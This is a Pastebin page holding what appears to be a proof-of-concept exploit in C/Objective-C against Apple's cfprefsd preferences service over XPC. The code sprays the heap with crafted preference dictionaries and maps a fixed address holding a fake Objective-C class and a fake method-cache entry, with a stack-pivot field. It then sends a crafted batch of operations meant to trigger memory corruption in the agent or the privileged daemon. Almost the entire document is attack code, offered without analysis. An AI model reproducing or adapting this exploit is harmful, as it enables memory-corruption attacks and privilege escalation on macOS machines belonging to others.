SHARE
TWEET

Untitled

a guest Jul 16th, 2019 68 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include <xpc/xpc.h>
  2. #import <pthread.h>
  3. #include <mach/mach.h>
  4. #include <mach/task.h>
  5. #include <dlfcn.h>
  6. #include <mach-o/dyld_images.h>
  7. #include <objc/runtime.h>
  8.  
  9. #define AGENT 1
  10.  
  11. #define FILL_DICT_COUNT 0x600
  12. #define FILL_COUNT 0x1000
  13. #define FREE_COUNT 0x2000
  14. #define FILL_SIZE (0xc0)
  15.  
  16. int need_stop = 0;
  17.  
  18. struct heap_spray {
  19.     void* fake_objc_class_ptr;
  20.     uint32_t r10;
  21.     uint32_t r4;
  22.     void* fake_sel_addr;
  23.     uint32_t r5;
  24.     uint32_t r6;
  25.     uint64_t cmd;
  26.     uint8_t pad1[0x3c];
  27.     uint32_t stack_pivot;
  28.     struct fake_objc_class_t {
  29.         char pad[0x8];
  30.         void* cache_buckets_ptr;
  31.         uint32_t cache_bucket_mask;
  32.     } fake_objc_class;
  33.     struct fake_cache_bucket_t {
  34.         void* cached_sel;
  35.         void* cached_function;
  36.     } fake_cache_bucket;
  37.     char command[32];
  38. };
  39.  
  40. void fill_once(){
  41.      
  42. #if AGENT
  43.     xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
  44. #else
  45.     xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
  46. #endif
  47.      
  48.     xpc_connection_set_event_handler(client, ^void(xpc_object_t response) {
  49.         xpc_type_t t = xpc_get_type(response);
  50.         if (t == XPC_TYPE_ERROR){
  51.             printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
  52.             need_stop = 1 ;
  53.         }
  54.         //printf("received an event\n");
  55.     });
  56.      
  57.     xpc_connection_resume(client);
  58.     xpc_object_t main_dict = xpc_dictionary_create(NULL, NULL, 0);
  59.      
  60.     xpc_object_t arr = xpc_array_create(NULL, 0);
  61.      
  62.     xpc_object_t spray_dict = xpc_dictionary_create(NULL, NULL, 0);
  63.     xpc_dictionary_set_int64(spray_dict, "CFPreferencesOperation", 8);
  64.     xpc_dictionary_set_string(spray_dict, "CFPreferencesDomain", "xpc_str_domain");
  65.     xpc_dictionary_set_string(spray_dict, "CFPreferencesUser", "xpc_str_user");
  66.      
  67.     char key[100];
  68.     char value[FILL_SIZE];
  69.     memset(value, "A", FILL_SIZE);
  70.     *((uint64_t *)value) = 0x4142010180202020;
  71.     //*((uint64_t *)value) = 0x180202020;
  72.     value[FILL_SIZE-1]=0;
  73.     for (int i=0; i<FILL_DICT_COUNT; i++) {
  74.         sprintf(key, "%d",i);
  75.         xpc_dictionary_set_string(spray_dict, key, value);
  76.     }
  77.        
  78.     //NSLog(@"%@", spray_dict);
  79.     for (uint64_t i=0; i<FILL_COUNT; i++) {
  80.         xpc_array_append_value(arr, spray_dict);
  81.     }
  82.      
  83.     xpc_dictionary_set_int64(main_dict, "CFPreferencesOperation", 5);
  84.      
  85.     xpc_dictionary_set_value(main_dict, "CFPreferencesMessages", arr);
  86.  
  87.     void* heap_spray_target_addr = (void*)0x180202000;
  88.     struct heap_spray* map = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
  89.     memset(map, 0, 0x1000);
  90.     struct heap_spray* hs = (struct heap_spray*)((uint64_t)map + 0x20);
  91.     //hs->null0 = 0;
  92.     hs->cmd = -1;
  93.     hs->fake_objc_class_ptr = &hs->fake_objc_class;
  94.     hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
  95.     hs->fake_objc_class.cache_bucket_mask = 0;
  96.     hs->fake_sel_addr = &hs->fake_cache_bucket.cached_sel;
  97.     // nasty hack to find the correct selector address
  98.     hs->fake_cache_bucket.cached_sel = 0x7fff00000000 + (uint64_t)NSSelectorFromString(@"dealloc");
  99.      
  100.     hs->fake_cache_bucket.cached_function = 0xdeadbeef;
  101.     size_t heap_spray_pages = 0x40000;
  102.     size_t heap_spray_bytes = heap_spray_pages * 0x1000;
  103.     char* heap_spray_copies = malloc(heap_spray_bytes);
  104.     for (int i = 0; i < heap_spray_pages; i++){
  105.     memcpy(heap_spray_copies+(i*0x1000), map, 0x1000);
  106.     }
  107.     xpc_dictionary_set_data(main_dict, "heap_spray", heap_spray_copies, heap_spray_bytes);
  108.  
  109.     //NSLog(@"%@", main_dict);
  110.     xpc_connection_send_message(client, main_dict);
  111.     printf("fill once\n");
  112.     xpc_release(main_dict);
  113. }
  114.  
  115. void trigger_vul(){
  116.     #if AGENT
  117.         printf("AGENT\n");
  118.         xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
  119.     #else
  120.         printf("DAEMON\n");
  121.         xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
  122.     #endif
  123.         xpc_connection_set_event_handler(conn, ^(xpc_object_t response) {
  124.             xpc_type_t t = xpc_get_type(response);
  125.             if (t == XPC_TYPE_ERROR){
  126.                 printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
  127.                 need_stop = 1 ;
  128.             }
  129.         });
  130.         xpc_connection_resume(conn);
  131.          
  132.         xpc_object_t hello = xpc_dictionary_create(NULL, NULL, 0);
  133.         xpc_object_t arr = xpc_array_create(NULL, 0);
  134.      
  135.         xpc_object_t arr_free = xpc_dictionary_create(NULL, NULL, 0);
  136.         xpc_dictionary_set_int64(arr_free, "CFPreferencesOperation", 4);
  137.         xpc_array_append_value(arr, arr_free);
  138.         for (int i=0; i<FREE_COUNT; i++) {
  139.             xpc_object_t arr_elem1 = xpc_dictionary_create(NULL, NULL, 0);
  140.             xpc_dictionary_set_int64(arr_elem1, "CFPreferencesOperation", 20);
  141.             xpc_array_append_value(arr, arr_elem1);
  142.         }
  143.         //printf("%p, %p\n", arr_elem1, hello);
  144.         xpc_dictionary_set_int64(hello, "CFPreferencesOperation", 5);
  145.         xpc_dictionary_set_value(hello, "CFPreferencesMessages", arr);
  146.  
  147.         //NSLog (@"%@", hello);
  148.         fill_once();
  149.         xpc_connection_send_message(conn, hello);
  150.         NSLog(@" trigger vuln");
  151.         xpc_release(hello);
  152. }
  153.  
  154. int main(int argc, const char * argv[]) {
  155.  
  156.     pthread_t fillthread1,triger_thread;
  157.     NSLog(@"start to trigger..");
  158.     trigger_vul();
  159.  
  160.     return 0;
  161. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top